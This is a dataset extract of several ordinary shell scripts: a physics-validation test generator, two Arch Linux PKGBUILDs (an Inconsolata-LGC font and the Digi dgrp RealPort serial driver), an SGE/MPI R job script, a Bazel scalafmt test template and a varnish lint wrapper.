blob_id
stringlengths 40
40
| language
stringclasses 1
value | repo_name
stringlengths 4
115
| path
stringlengths 2
970
| src_encoding
stringclasses 28
values | length_bytes
int64 31
5.38M
| score
float64 2.52
5.28
| int_score
int64 3
5
| detected_licenses
listlengths 0
161
| license_type
stringclasses 2
values | text
stringlengths 31
5.39M
| download_success
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|---|
d4a446a15f0457e4f57d8764afa2c99b67b817c4
|
Shell
|
rushioda/PIXELVALID_athena
|
/athena/Trigger/TrigValidation/TrigInDetValidation/scripts-art/makeart
|
UTF-8
| 822 | 2.96875 | 3 |
[] |
no_license
|
#!/bin/bash
# for job in $(grep TrigInDet ../TIDAbuild/makefile | grep -v \=| awk '{print $1}'); do
for job in $(grep include ../TIDAbuild/TrigInDetValidation_TestConfiguration_main.xml | grep -v "<\!-" | sed 's|.* \"||g' | sed 's|\".*||g'); do
echo
echo $job
SAMPLE=$(grep include ../TIDAbuild/$job | grep sample | grep -v "<\!-" | head -1 | sed 's|.* \"||g' | sed 's|\".*||g')
DATASET=$(grep dataset ../TIDAbuild/$SAMPLE | grep -v "<\!-" | head -1 | sed 's|.*<dataset>||g' | sed 's|</dataset>.*||g' )
echo "SAMPLE: $SAMPLE"
echo "DATASET: $DATASET"
# ls -ld $DATASET
../utils/mkart ../TIDAbuild/$job -d $DATASET -o .
_job=test_$(echo $(basename $job .xml) | tr '[:upper:]' '[:lower:]' )
chmod 755 $_job.sh
mv $_job.sh ../test
ls -ld ../test/$_job.sh
done
| true |
2107f1ae223dbdb04f34814dcb14723299069b7f
|
Shell
|
delkyd/alfheim_linux-PKGBUILDS
|
/otf-inconsolata-lgc-git/PKGBUILD
|
UTF-8
| 1,163 | 2.609375 | 3 |
[
"MIT"
] |
permissive
|
# maintainer: tagener-noisu @ GitHub
pkgname=otf-inconsolata-lgc-git
_pkgname=otf-inconsolata-lgc
pkgver=1.3.0
pkgrel=1
pkgdesc="a modified version of Inconsolata with added Cyrillic alphabet"
url="https://github.com/MihailJP/Inconsolata-LGC/"
arch=('any')
license=('OFL')
makedepends=('git' 'fontforge')
provides=($_pkgname)
conflicts=($_pkgname)
source=("$_pkgname::git+https://github.com/MihailJP/Inconsolata-LGC.git")
md5sums=('SKIP')
pkgver() {
cd $_pkgname
git describe --tags | grep -Po '(\d\.)+\d'
}
build() {
cd $_pkgname
make otf
}
package() {
cd $_pkgname
install -m644 -D Inconsolata-LGC.otf\
"$pkgdir/usr/share/fonts/OTF/InconsolataLGC.otf"
install -m644 -D Inconsolata-LGC-Bold.otf\
"$pkgdir/usr/share/fonts/OTF/InconsolataLGC-Bold.otf"
install -m644 -D Inconsolata-LGC-Italic.otf\
"$pkgdir/usr/share/fonts/OTF/InconsolataLGC-Italic.otf"
install -m644 -D Inconsolata-LGC-BoldItalic.otf\
"$pkgdir/usr/share/fonts/OTF/InconsolataLGC-BoldItalic.otf"
install -m644 -D LICENSE "$pkgdir/usr/share/licenses/$_pkgname/LICENSE"
install -m644 -D README "$pkgdir/usr/share/doc/$_pkgname/README"
}
# vim:ts=2:sw=2:et:
| true |
7f59f49b77c5ae47771e24e8a9ced9b01cb4bc96
|
Shell
|
floswald/parallelTest
|
/R/clusterTime/timer.sh
|
UTF-8
| 772 | 2.90625 | 3 |
[] |
no_license
|
#!/bin/bash
echo "starting qsub script file for fibonacci timer"
source ~/.bash_profile
date
# here's the SGE directives
# ------------------------------------------
#$ -q batch.q # <- the name of the Q you want to submit to
#$ -pe mpich 20 # mpich <- load the openmpi parallel env w/ $(arg1) slots
#$ -S /bin/bash # <- run the job under bash
#$ -N mpi-timing # <- name of the job in the qstat output
#$ -o timer.out # direct output stream to here
#$ -e timer.err # <- name of the stderr file.
#$ -cwd
#module add openmpi/gcc
module load openmpi
#module load open64
#module load gcc
module load r/3.1.3
echo "loaded modules"
module list
echo "calling mpirun now"
mpirun -np 20 ~/R/x86_64-unknown-linux-gnu-library/3.1/snow/RMPISNOW -q < timer.r > timer.Rout
| true |
56de62c2c8e08be25a9f7f696a0ce7f0b880525c
|
Shell
|
delkyd/alfheim_linux-PKGBUILDS
|
/dgrp/PKGBUILD
|
UTF-8
| 23,589 | 2.8125 | 3 |
[] |
no_license
|
# Maintainer: Chris Severance aur.severach aATt spamgourmet dott com
# Todo: rewrite dgrp_cfg_node to be systemd compatible.
# Todo: add systemd getty support to drpadmin
# Todo: Default user, group, and mode are in the backing store. These do not work. They are set by udev and apply to all ports.
# Digi bug: terminal freezes when viewing /proc/dgrp/mon
# Digi bug: drpd terminates after the first tty open when launched from dgrp_cfg_node. It stays working when launched by systemd restart
# Digi bug: occasional Can't open serial /dev/ttyaf00: Resource temporarily unavailable for PortServer TS (not II)
# Digi bug: occasional dropped characters for PortServer II, PortServer TS, Digi One
# Digi bug: Digi RealPort Manager (java) is unable to add new Realport because it uses the wrong options
# Digi bug: mbrowse reports a few parsing errors in MIB
# Digi bug: make compatible with OpenSSL 1.1
# Digi bug: transfer hangs if unit is repowered during live connection. Tested in 4.11, 4.9, and 4.4
# Digi Realport driver for Arch Linux. See Digi release notes for supported products.
# Build instructions: (Skip these first two sections)
# This only applies if you installed a long time ago when this driver would still
# compile and haven't upgraded in a while. Now this can't be built on Arch without a
# patch so new users skip to the next section.
# This PKGBUILD does not clean up the slop from the Digi supplied make.
# If you have already installed according to the the instructions
# log on as root and go through the process in reverse from the original
# unmodified Digi tgz. You won't lose your configuration.
# make preuninstall; make uninstall
# To clean up you may want to remove the folders /share/ and /etc/init.d/
# Arch Linux does not use these folders though they may have spurious files from
# other misdirected installs.
# The next section: ... Now onto the real install ...
# Edit PKGBUILD.local after the first run
if [ ! -s 'PKGBUILD.local' ]; then
cat > 'PKGBUILD.local' << EOF
# Set the mode for all created devices.
_opt_defaultmode="0660" # default: 0600
_opt_defaultgroup="uucp" # default: root
# If you need more granular control.
# See http://knowledge.digi.com/articles/Knowledge_Base_Article/HOW-TO-Preserve-device-permissions-settings-with-RealPort-in-Linux/
# Once set copy /etc/udev/rules.d/10-dgrp.rules to the PKGBUILD folder
# and it will be made into the package.
# Digi's product name is inconsistent. Here you can choose. RealPort seems the most popular.
_opt_RealPort='RealPort' # Can also be Realport
_opt_DKMS=1 # This can be toggled between installs
EOF
fi
source 'PKGBUILD.local'
# Since the kernel module isn't loaded until you have a device
# configured, these services are automatically enabled and started
# for immediate hardware support. They will be reenabled each time the
# package is installed or upgraded.
# systemctl enable dgrp_daemon.service
# systemctl start dgrp_daemon.service
# systemctl enable dgrp_ditty.service
# systemctl start dgrp_ditty.service
# To stop these services from loading:
# systemctl disable dgrp_daemon.service
# systemctl stop dgrp_daemon.service
# systemctl disable dgrp_ditty.service
# systemctl stop dgrp_ditty.service
# To get started using your Digi products:
# man -Ik "Digi "
# man dgrp_gui
# man dgrp_cfg_node
# man ditty
# man drpadmin
# The man page for dgrp_cfg_node lacks some detail. See this page for more info
# ftp://digiftp.digi.com/support_archive/support/manuals/psts/rp-linux-conf-managing-portservers-with-dgrp-config-node.html
# To get your equipment up faster on servers that don't have X installed
# I've supplied a console shell script "drpadmin".
# It is adapted from Digi's RealPort "drpadmin" for Sun, HP UX, and SCO and has the same
# look and feel.
# Show available Digi devices
# addp.pl -Q
# For information about using dgrp_ditty.service to maintain your ditty settings
# across reboots see http://knowledge.digi.com/articles/Knowledge_Base_Article/How-do-I-configure-my-ditty-rp-port-settings-to-stay-after-rebooting-when-using-RealPort-in-Linux/
# UnInstall cleanup:
# rm /etc/dgrp.backing.store* /usr/bin/dgrp/config/ditty.commands
# rmdir /usr/bin/dgrp/config
# rmdir /usr/bin/dgrp
set -u
pkgname='dgrp'
pkgver='1.9.38'
pkgrel='1'
pkgdesc="tty driver for Digi ${_opt_RealPort} ConnectPort EtherLite Flex One CM PortServer TS IBM RAN serial console terminal servers"
#_pkgdescshort="Digi ${_opt_RealPort} driver for Ethernet serial servers" # For when we used to generate the autorebuild from here
arch=('i686' 'x86_64')
url='https://www.digi.com/'
license=('GPL' 'custom') # OpenSSL=Apache. Arch is always new enough to not need their version.
depends=('openssl-1.0' 'grep' 'awk' 'systemd' 'procps-ng' 'psmisc' 'perl')
optdepends=(
{tk,gksu}': Digi RealPort Manager GUI'
'java-runtime: Digi Device Discovery Tool GUI'
'mbrowse: SNMP browser GUI'
)
backup=('etc/dgrp.backing.store')
options=('!docs' '!emptydirs')
install="${pkgname}-install.sh"
_verwatch=('https://www.digi.com/support/includes/drivers.aspx?pid=1954&osvid=218' '<li>.*RealPort Driver for Linux ver\. \([0-9\.]\+\), tgz version.*' 'f')
_mibs=(
'40002014_a.mib' # DIGI Connectware Manager Notifications
'40002194_H.mib' # Portserver TS MIB File
'40002195_P.mib' # Digi Structures of Management (SMI) MIB
'40002236_b.mib' # Digi MODBUS MIB
'40002237_c.mib' # Digi Power Supply MIB
'40002238_b.mib' # Digi Multi-Electrical Interface (MEI) MIB
'40002239_B.mib' # Digi Socket ID MIB File
'40002240_B.mib' # Portserver TS Port Buffering MIB File
'40002257_B.mib' # Digi IA MIB
'40002258_B.mib' # Digi UDP Serial MIB
'40002335_B.mib' # Portserver TS Secure Access MIB File
'40002336_C.mib' # Digi Power Management MIB File
'40002337_D.mib' # Digi Power Management Traps MIB
'40002338_D.mib' # Digi Keyword Notification MIB
'40002339_D.mib' # Digi Login Traps MIB
'40002410_a.mib' # DIGI Connect Device Info Management Information Base
'40002411_a.mib' # Digi Connect Serial Alarm Traps MIB
'40002478_B.mib' # Digi NFS TRAPS MIB
'40002479_F.mib' # CM Management Information Base
'40002514_a.mib' # Digi Connectware Manager Notifications MIB
'40002515_a.mib' # Digi Connect Device Identity MIB
'40002520_a.mib' # Digi Power Traps MIB
'40002709_C.mib' # Digi ConnectPort LTS MIB
'rfc1316.mib' # Portserver II RFC1316-MIB Definitions
'rfc1317.mib' # Portserver II RFC1317-MIB Definitions
)
# Let me know if these dnw (do not want) items are actually serial device servers and should be installed.
_mibsdnw=(
'40002325_D.mib' # DIGI Wireless Lan Management Information Base
'40002370_C.mib' # DIGI Serial Traps Management Information Base
'40002436_B.mib' # DIGI Modem Test Traps Management Information Base
'40002477_B.mib' # Management Information Base
'40002519_F.mib' # Passport Management Information Base
'40002521_a.mib' # DIGI IPMI Notification Feature Management Information Base
'40002593_B.mib' # DIGI Connect Mobile Information Management Information Base
'40002594_a.mib' # DIGI Mobile Traps Management Information Base
'40002782_a.mib' # Passport Management Information Base
'40002846_A.mib' # DIGI Connect Mobile Status Management Information Base
)
_mibsrc='http://ftp1.digi.com/support/utilities/'
_filever="${pkgver//\./-}"
_filever="${_filever/-/.}"
source=(
#"${pkgname}-${pkgver}-81000137_X.tgz::http://ftp1.digi.com/support/driver/81000137_X.tgz"
#"${pkgname}-${pkgver}-beta.tgz::ftp://ftp1.digi.com/support/driver/RealPort%20Linux%20Beta%20Driver/dgrp-${_filever}_y1p.tgz.rpm"
"${pkgname}-${pkgver}-81000137_Y.tgz::http://ftp1.digi.com/support/driver/81000137_Y.tgz"
'drpadmin' 'drpadmin.1' # "autorebuild-${pkgname}.sh"
'addp_perl-1.0.tgz::https://github.com/severach/addp/archive/f92a6fd2050c9f32a5a11cac18cd9def78138530.tar.gz'
'ftp://ftp1.digi.com/support/utilities/AddpClient.zip'
'dgrp-patch-signal_pending-kernel-4-11.patch'
"${_mibs[@]/#/${_mibsrc}}"
)
unset _mibsrc
#source_i686=('http://ftp1.digi.com/support/utilities/40002890_A.tgz')
#source_x86_64=('http://ftp1.digi.com/support/utilities/40002889_A.tgz') # compiled i686 therefore worthless
# addp and sddp are incomplete. I replaced them with addp.pl
sha256sums=('e474518da5b3feddd1f4dd0083ac8125e34ba07da9884cbd3ebd1955006891d7'
'42898b9d24262de27e9b1f3067d51d01373810b7c9e4991403a7f0a5dd7a26cf'
'66f8b106a052b4807513ace92978e5e6347cef08eee39e4b4ae31c60284cc0a3'
'9d79df8617e2bb1042a4b7d34311e73dc4afcdfe4dfa66703455ff54512427f5'
'00d7b452a4f16599f7162f512a05599614115554992b872fc5302b521ea04468'
'83c90a2a9518fde5f500f336a181e86662b62065929bedd60fbd380dc2f4a9da'
'4b54148008b02a2544d8b33f07c471a068b0973ac5402967af8bf73a28b6a8b6'
'a1833d877b07b0f424676241b3e1070e116d07965db3131a61a3b6ce0ff90063'
'6fca5df11304d905f561a0c251419619960a8da8e724d36b34e9977e97f02528'
'2dd7868acf66c14d67012a2263088b08d8f9320c64b64db94740fae54b485c78'
'26159071b1b0df2af04d612e32ce72c8835f241c56b9fa2dadee53d9d127d0b7'
'f686011f7db06f0632f6460566da751a00fccd04bb1527b8a83239aad46d4de5'
'50130240e3ce85759aa99b3a268568de6a97084eeb40a92ef0b4937333808d8a'
'f4a89790ad1413ecfc2b723a45fa0d0b93ae01cc433d930db4e689f82d0367fd'
'3e2881ebf6866751a64e7cf948b85a3c2053f2d0a8799234c56b732cde17b853'
'c54576fad5ccedfd50cebc22a6dd45bd8c4deb875282f5c7d1a89a33426c1746'
'08eecc0e5d8f9fffe0fcf3b9f47e56c81bd713964bd7aeb0f4b6a6de3e0f3592'
'75ba60917769c2cc2324050b74a4e618f0904464ece15646045fd931001c47e4'
'43e7f12bb32343254f472260fd26566e8aab58764ba3e73d500542e462f27ac5'
'241ef4a96b4d34652bfc7a9ce0bab317129e0123f05c68713a45d88624ddd19b'
'21b8d7c50cacc418611b909159ed6258dc13026e8e55034e86965227b8176509'
'471f1342398c4fce86e1d437c4f6053be75ae3a99337613d39c05e4e3c80ede9'
'06a81a5dfaa1c61944d1a12d2efc8129c0ee72f630817f844879bd17d6cb4d80'
'a3286df00ca3566361faf1f128752c56d046558277cd90025831f9840129e33f'
'33b29ee72b590ecadd54e893317a279bb49a2dd4a189fd386491e1a67ef193a8'
'4011005db626db67b50f13b6242db1fed0d11b0d89e56af7ae39f5719d7cd323'
'679b081c31e5fc156ad9c55afc0bba9ec354f37e28eeeb453bcbd6b1cf68988e'
'731e05fc551367faa6ad5dc317eedf305388ab12db196c0a1361a3d01bd35279'
'c471cafa43503a40d43b42acd8bc6ef49db29e55a74e0494c85f729ea45fe243'
'5cac7ce2e6f043127f314b93694af021ae7820ffb5bf3de343da7a240d05e9c8'
'8654496d83c083e457e8bb9bae2b1e71804d156a38c284d89872d0125eba947d')
if [ "${_opt_DKMS}" -ne 0 ]; then
depends+=('linux' 'dkms' 'linux-headers')
else
makedepends+=('linux-headers')
fi
# Check for updates and case errors to the 2 mib lists
_fn_mibcheck() {
echo 'Checking for newer and misnamed MIB'
local line
local linea
local file='/tmp/PKGBUILD.mibs'
# Get list of files
while IFS='' read -r line || [[ -n "${line}" ]]; do
read -r -a linea <<<"${line}"
line="${linea[8]}" # filename
case "${line}" in
4000*.mib)
echo "${line}" >> "${file}"
;;
esac
done < <(curl -s 'ftp://ftp1.digi.com/support/utilities/') # curl is sorted and case insensitive because Digi runs WSFTP. We can't assume this will be always so.
# get list of latest files
local lineu linep lineup
lineup=''
linep=''
linea=()
while IFS='' read -r line || [[ -n "${line}" ]]; do
lineu="${line^^}"
if [ "${lineup%%_*}" != "${lineu%%_*}" ] && [ ! -z "${linep}" ]; then
linea+=("${linep}")
fi
lineup="${lineu}"
linep="${line}"
done < <(sort -f "${file}")
rm -f "${file}"
linea+=("${linep}")
# Check against _mibs
local found mib mibu
for line in "${linea[@]}"; do
lineu="${line^^}"
found=0
for mib in "${_mibs[@]}" "${_mibsdnw[@]}"; do
mibu="${mib^^}"
if [ "${lineu%%_*}" = "${mibu%%_*}" ]; then
if [ "${lineu}" != "${mibu}" ]; then
echo "${mib} has been updated to ${line}"
elif [ "${line}" != "${mib}" ]; then
echo "Case correction: ${mib} -> ${line}"
fi
found=1
break
fi
done
if [ "${found}" -eq 0 ]; then
echo "${line} is missing"
fi
done
return 1
}
#_fn_mibcheck
# bash -c 'source PKGBUILD; _fn_mibcheck'
prepare() {
set -u
cd dgrp-*/
rm -f daemon/openssl-*.tar.gz # I don't want their version to build if OpenSSL version detection fails in the future
# Standardize name of RealPort
sed -e "s/RealPort/${_opt_RealPort}/gI" -i $(grep -lrF $'RealPort\nRealport' .)
# grep -ri realport . | grep -vF $'RealPort\nRealport'
sed -e '# Cosmetic fix for newer gcc compilers' \
-e 's:\(3.9\*|4.\*\))$:\1|5.*|6.*|7.*):g' \
-e "# I can't find any other way to fix the modules dir" \
-e 's:/lib/modules/:/usr&:g' \
-e '# Kill a harmless mkdir error. They mkdir the folder then dont use it.' \
-e 's@^\(\s\+\)\(mkdir -p /usr/lib/modules/${osrel}/misc\)$@\1: #\2@g' \
-i 'configure'
# Eradicate sbin before we even get started
sed -e 's:/usr/sbin:/usr/bin:g' -e 's:/sbin/:/usr/bin/:g' -i 'configure' Makefile* */Makefile scripts/{preun,post}install
# Fix the installers. We do in PKBGUILD what we can and the just a little in install.
# cp -p 'scripts/postinstall' 'scripts/postinstall.Arch' # DEBUG for comparison
sed -e '# Some security for root' \
-e 's:^#!\s*/bin/sh$:&\nif [ "${EUID}" -ne 0 ]; then\n echo "Must be root!"\n exit 1\nfi:g' \
-e '# Remove Install noise' \
-e 's:^\(\s*\)\(echo "Running\):\1#\2:g' \
-e '# Block the usage of chkconfig' \
-e 's:/usr/bin/chkconfig:/usr/bin/true:g' \
-e '# Remove noise for defunct chkconfig' \
-e 's:^\(\s\+\)\(echo "Added\):\1#\2:g' \
-e '# Automatically bring back pacsave file on reinstall' \
-e 's:^if \[ -f /etc/dgrp:if [ -s "/etc/dgrp.backing.store.pacsave" -a ! -s "/etc/dgrp.backing.store" ]; then\n mv "/etc/dgrp.backing.store.pacsave" "/etc/dgrp.backing.store"\nfi\n&:g' \
-e '# No need to upgrade and back up a blank file' \
-e 's:-f \(/etc/dgrp.backing.store\):-s \1:g' \
-e '# Why depend on /tmp when we can use the /etc folder which is where admin will be looking to fix their non working hardware' \
-e 's:/tmp/dgrp/dgrp.backing.store:/etc/dgrp.backing.store:g' \
-e '# The rest is done in package.' \
-e 's:^echo "Checking:exit 0\n&:g' \
-e '# Prepare the links for package to use them' \
-e 's:^\(\s\+\)ln -s /usr/bin/\([^ ]\+\) \(.\+\)$:\1ln -sf "\2" "${_DESTDIR}\3":g' \
-e "# All that's left is config conversion" \
-i 'scripts/postinstall'
#cp -p 'scripts/preuninstall' 'scripts/preuninstall.Arch' # For comparison
sed -e '# Some security for root' \
-e 's:^#!\s*/bin/sh$:&\nif [ "${EUID}" -ne 0 ]; then\n echo "Must be root!"\n exit 1\nfi:g' \
-e '# Remove UnInstall noise' \
-e 's:^\(\s*\)\(echo "Running\):\1#\2:g' \
-e '# Block the usage of chkconfig' \
-e 's:/usr/bin/chkconfig:/usr/bin/true:g' \
-e '# Remove more noise' \
-e 's:^\(\s\+\)\(echo "Removed\):\1#\2:g' \
-e '# No need to sleep. The daemons are shut down by systemd' \
-e 's:^sleep :#&:g' \
-e '# pacman handles the links and files' \
-e 's;if \[ -L ;if ! : \&\& [ -L ;g' \
-e 's;^\(\s*\)\(rm -f \);\1: #\2;g' \
-e '# Fixing this file was almost useless. All it does after we disable everything is an rmmod' \
-i 'scripts/preuninstall'
test ! -f 'scripts/postinstall.Arch' -a ! -f 'scripts/preuninstall.Arch'
# Change insmod to modprobe
sed -e 's:\${INSMOD}.*$:modprobe "${DGRP_DRIVER}" # &:g' -i 'config/dgrp_cfg_node'
# drpd makefile does not honor --with-ssl-dir. We convert the bogus folder to the one we need.
sed -e 's:/usr/local/ssl/include:/usr/include/openssl-1.0:g' \
-e 's:/usr/local/ssl/lib:/usr/lib/openssl-1.0:g' \
-i 'daemon/Makefile.in'
# Branding in dmesg
sed -e 's@ please visit [^"]\+"@ please visit https://aur.archlinux.org/packages/dgrp/"@g' \
-e '/^dgrp_init_module/,/^$/ s@version: %s@& Arch Linux@g' \
-i driver/[0-9]*/dgrp_driver.c
set +u
}
build() {
set -u
cd dgrp-*/
if [ ! -s 'Makefile' ]; then
# this generates a harmless error as it tries to make a folder in /usr/lib/modules...
# --with-ssl-dir supplies to -I but mainly for configure. CFLAGS goes everywhere.
# --with-ssl-dir is supplied to -L too which is worthless. We amend with LDFLAGS.
CFLAGS="${CFLAGS} -I/usr/include/openssl-1.0" \
LDFLAGS="${LDFLAGS} -L/usr/lib/openssl-1.0" \
./configure -q --sbindir='/usr/bin' --prefix='/usr' --mandir='/usr/share/man' --with-ssl-dir='/usr/include/openssl-1.0'
fi
#. 'config/file_locations.Arch'
make -s all -j1 # This package doesn't support threaded make and it's too small to fix
set +u
}
# Copy this line into the .install file
_daemons=('daemon' 'ditty')
package() {
set -u
if [ "${_opt_DKMS}" -eq 0 ]; then
# I don't want Linux version info showing on AUR web. After a few months 'linux<0.0.0' makes it look like an out of date package.
local _kernelversionsmall="$(uname -r)"
_kernelversionsmall="${_kernelversionsmall%%-*}"
_kernelversionsmall="${_kernelversionsmall%\.0}" # trim 4.0.0 -> 4.0, 4.1.0 -> 4.1
# prevent the mksrcinfo bash emulator from getting these vars!
eval 'conf''licts=("linux>${_kernelversionsmall}" "linux<${_kernelversionsmall}")'
eval 'dep''ends+=("linux=${_kernelversionsmall}")'
fi
cd dgrp-*/
#. 'config/file_locations.Arch'
make -s -j1 RPM_BUILD_ROOT="${pkgdir}" install
install -m644 'dinc/dinc.1' -t "${pkgdir}/usr/share/man/man1/" # They bypass the Makefile that does this
chmod 644 "${pkgdir}/usr/bin/dgrp/config"/{dgrp.gif,file_locations}
chmod 744 "${pkgdir}/usr/bin/"{dgelreset,dgipserv}
# Create the links, customized for us by prepare above
grep 'ln -sf ' 'scripts/postinstall' |\
_DESTDIR="${pkgdir}" \
sh -e -u -s --
#rmdir "${pkgdir}/usr/share/doc" # makepkg does this for us
# Install MIB
local _mib
for _mib in "${srcdir}"/*.mib; do
install -Dpm0644 "${_mib}" "${pkgdir}/usr/share/snmp/mibs/digi-serial-server-${_mib##*/}.txt"
done
# Prepend our message on the udev rules file
install -dm755 "${pkgdir}/etc/udev/rules.d/"
touch "${pkgdir}/${backup[0]}" # postinstall handles the pacsave file automatically
chmod 644 "${pkgdir}/${backup[0]}"
sed -e 's:^KERNEL=="cu_dgrp:#&:g' -i "${pkgdir}/tmp/dgrp/10-dgrp.rules" # Recommended by Digi
cat > "${pkgdir}/etc/udev/rules.d/10-dgrp.rules" << EOF
# Automatically generated by ${pkgname}-${pkgver} PKGBUILD from Arch Linux AUR
# https://aur.archlinux.org/
# Generated: $(date +"%F %T")
# Warning: If you modify this file you should copy it into the folder with the
# PKGBUILD or you might lose the customizations on the next install.
# This file was customized by the PKGBUILD by setting the mode on all ports
# to MODE=(see below). If all you need is a different mode on all ports
# then set the option in the PKGBUILD. If you need more granular control
# see these customization instructions:
# http://knowledge.digi.com/articles/Knowledge_Base_Article/HOW-TO-Preserve-device-permissions-settings-with-RealPort-in-Linux/
# Then copy this file into the folder with PKGBUILD.
$(cat "${pkgdir}/tmp/dgrp/10-dgrp.rules")
EOF
rm -f "${pkgdir}/tmp/dgrp/10-dgrp.rules"
rmdir "${pkgdir}/tmp/dgrp" "${pkgdir}/tmp" # crashes if other files ever show up in /tmp/dgrp
if [ ! -z "${_opt_defaultmode:-}" ]; then
sed -e 's:^\(KERNEL=="tty_dgrp\)\(.*\)$:\1\2, MODE="'"${_opt_defaultmode}"'", GROUP="'"${_opt_defaultgroup}"'":g' -i "${pkgdir}/etc/udev/rules.d/10-dgrp.rules"
fi
if [ -s "${srcdir}/../10-dgrp.rules" ]; then
cp "${srcdir}/../10-dgrp.rules" "${pkgdir}/etc/udev/rules.d/10-dgrp.rules" # no cp -p in case this file has any wrong user:group
fi
chmod 644 "${pkgdir}/etc/udev/rules.d/10-dgrp.rules"
install -Dpm755 "${pkgdir}/etc/init.d"/{dgrp_daemon,dgrp_ditty} -t "${pkgdir}/usr/bin/dgrp/daemon/"
rm -f "${pkgdir}/etc/init.d"/{dgrp_daemon,dgrp_ditty}
rmdir "${pkgdir}/etc/init.d"
# systemd integration.
#install -dm755 "${pkgdir}/usr/lib/systemd/system/"
local _daemon
for _daemon in "${_daemons[@]}"; do
install -Dm644 <(cat << EOF
# Automatically generated by ${pkgname}-${pkgver} PKGBUILD from Arch Linux AUR
# https://aur.archlinux.org/
[Unit]
Description="Digi ${_opt_RealPort} ${_daemon}"
After=network.target
[Service]
Type=forking
ExecStart=/usr/bin/dgrp/daemon/dgrp_${_daemon} start
ExecStop=/usr/bin/dgrp/daemon/dgrp_${_daemon} stop
ExecReload=/usr/bin/dgrp/daemon/dgrp_${_daemon} reload
[Install]
WantedBy=multi-user.target
EOF
) "${pkgdir}/usr/lib/systemd/system/dgrp_${_daemon}.service"
#chmod 644 "${pkgdir}/usr/lib/systemd/system/dgrp_${_daemon}.service"
done
# Install my custom drpadmin with man page.
install -Dm755 "${srcdir}/drpadmin" -t "${pkgdir}/usr/bin/"
sed -e 's/^#distro=:::$/g_distro="Arch Linux"/g' \
-e "s/RealPort/${_opt_RealPort}/gI" -i "${pkgdir}/usr/bin/drpadmin"
install -Dm444 "${srcdir}/drpadmin.1" -t "${pkgdir}/usr/share/man/man1/"
# Standardize name of RealPort in man pages
sed -e "s/RealPort/${_opt_RealPort}/gI" -i "${pkgdir}/usr/share/man/man8/"*.8 "${pkgdir}/usr/share/man/man1/"*.1
# Desktop file for config tool
install -Dm644 <(cat << EOF
[Desktop Entry]
Name=Digi RealPort Manager
GenericName=Device Server Manager
Comment=Manage tty connections to Digi serial device servers
Exec=gksudo -k -u root dgrp_gui
Terminal=false
Type=Application
#Icon=
Categories=Application;Utility;
MimeType=application/x-executable
EOF
) "${pkgdir}/usr/share/applications/dgrp_cfg.desktop"
# addp tui and gui utilities
#install -Dpm755 "${srcdir}/addp" -t "${pkgdir}/usr/bin/"
install -Dpm755 "${srcdir}"/addp-*/'/addp.pl' "${pkgdir}/usr/bin/"
install -Dpm644 "${srcdir}/AddpClient.jar" -t "${pkgdir}/usr/bin/dgrp/"
# Desktop file for config tool
install -Dm644 <(cat << EOF
# Automatically generated by ${pkgname}-${pkgver} PKGBUILD from Arch Linux AUR
# https://aur.archlinux.org/
[Desktop Entry]
Name=Digi Device Discovery Tool
GenericName=Device Server Manager
Comment=Manage Digi serial device servers
Exec=java -jar /usr/bin/dgrp/AddpClient.jar
Terminal=false
Type=Application
#Icon=
Categories=Application;Utility;
MimeType=application/x-executable
EOF
) "${pkgdir}/usr/share/applications/AddpClient.desktop"
# DKMS
if [ "${_opt_DKMS}" -ne 0 ]; then
rm -rf "${pkgdir}/usr/lib/modules/"
local _dkms="${pkgdir}/usr/src/${pkgname}-${pkgver}"
install -Dm644 <(cat << EOF
# Automatically generated by ${pkgname}-${pkgver} PKGBUILD from Arch Linux AUR
# https://aur.archlinux.org/
PACKAGE_NAME="${pkgname}"
PACKAGE_VERSION="${pkgver}"
AUTOINSTALL="yes"
BUILT_MODULE_NAME[0]="dgrp"
BUILT_MODULE_LOCATION[0]="driver/build"
# Using all processors doesn't compile this tiny module any faster.
MAKE[0]="make -j1 -C 'driver/build'"
CLEAN[0]="make -j1 -C 'driver/build' clean"
# Placing the DKMS generated module in a different location than the standard install prevents conflicts when PKGBUILD _opt_DKMS is toggled
DEST_MODULE_LOCATION[0]="/kernel/drivers/misc"
EOF
) "${_dkms}/dkms.conf"
install -dm755 "${_dkms}/driver/build/"
cp -pr 'driver/build/' "${_dkms}/driver/"
cp -pr 'commoninc/' "${_dkms}/"
install -pm644 'Makefile.inc' -t "${_dkms}/"
sed -e 's:/usr/lib/modules/[^/]\+/:/usr/lib/modules/$(KERNELRELEASE)/:g' \
-i "${_dkms}/driver/build/Makefile"
make -C "${_dkms}/driver/build/" clean
fi
set +u
}
set +u
| true |
14efe06dc6a4d306dc6631433d7985ad252f827d
|
Shell
|
gergelyfabian/rules_scala
|
/scala/scalafmt/private/format-test.template.sh
|
UTF-8
| 1,070 | 3.53125 | 4 |
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash -e
# Explanation: IF $BUILD_WORKSPACE_DIRECTORY is set to something (as it would be during a
# `bazel run`), then append a trailing `/`. If it's not set (as it wouldn't be during
# a `bazel test` invocation in a wrapping `sh_test` rule), then elide the trailing `/`, and
# instead rely upon a relative path from the test's runtrees. The corresponding change
# to `phase_scalafmt` places the source files into the `runfiles` set, so they'll be symlinked
# correctly in the appropriate relative location.
WORKSPACE_ROOT="${1:-${BUILD_WORKSPACE_DIRECTORY}${BUILD_WORKSPACE_DIRECTORY:+/}}"
RUNPATH="${TEST_SRCDIR-$0.runfiles}"/%workspace%
RUNPATH=(${RUNPATH//bin/ })
RUNPATH="${RUNPATH[0]}"bin
EXIT=0
while read original formatted; do
if [[ ! -z "$original" ]] && [[ ! -z "$formatted" ]]; then
if ! cmp -s "${WORKSPACE_ROOT}$original" "$RUNPATH/$formatted"; then
echo $original
diff "${WORKSPACE_ROOT}$original" "$RUNPATH/$formatted" || true
EXIT=1
fi
fi
done < "$RUNPATH"/%manifest%
exit $EXIT
| true |
5af35788cc81ad6d62e55d20ae81d1239fe3bb69
|
Shell
|
akrito/Varnish-Least-Busy-Director
|
/varnish-cache/bin/varnishd/vclflint.sh
|
UTF-8
| 228 | 3.109375 | 3 |
[
"BSD-2-Clause"
] |
permissive
|
#!/bin/sh
#
# Run flexelint on the VCL output
if [ "x$1" = "x" ] ; then
./varnishd -C -b localhost > /tmp/_.c
elif [ -f $1 ] ; then
./varnishd -C -f $1 > /tmp/_.c
else
echo "usage!" 1>&2
fi
flexelint vclflint.lnt /tmp/_.c
| true |
45881c5667514ee6773e444d14ec9c7c07ad59e4
|
Shell
|
TheWover/PoshC2
|
/Files/posh-service
|
UTF-8
| 549 | 3.59375 | 4 |
[
"BSD-3-Clause"
] |
